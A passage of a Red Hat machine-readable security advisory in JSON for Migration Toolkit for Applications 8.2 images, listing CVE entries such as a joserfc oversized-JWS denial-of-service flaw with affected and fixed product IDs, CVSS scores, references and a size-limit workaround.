"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "vllm: starlette: vLLM: Critical authentication bypass allows unauthorized API access"
},
{
"cve": "CVE-2026-48990",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-17T22:00:51.839483+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2490168"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in joserfc, a Python library for JSON Object Signing and Encryption (JOSE). This vulnerability allows a remote attacker to cause resource exhaustion, leading to a Denial of Service (DoS), by sending oversized JSON Web Signature (JWS) payloads. The library fails to apply size limits, specifically JWSRegistry.max_payload_length, when processing RFC7797 b64=false JWS payloads.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "RHBZ#2490168",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490168"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990"
},
{
"category": "external",
"summary": "https://github.com/authlib/joserfc/releases/tag/1.6.7",
"url": "https://github.com/authlib/joserfc/releases/tag/1.6.7"
},
{
"category": "external",
"summary": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5",
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
}
],
"release_date": "2026-06-17T21:08:10.534000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "The risk can be mitigated by rejecting oversized serialized JWS inputs before they reach joserfc and enforcing strict request/body size limits at the application or reverse-proxy layer.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads"
},
{
"cve": "CVE-2026-54283",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-22T18:01:06.194658+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
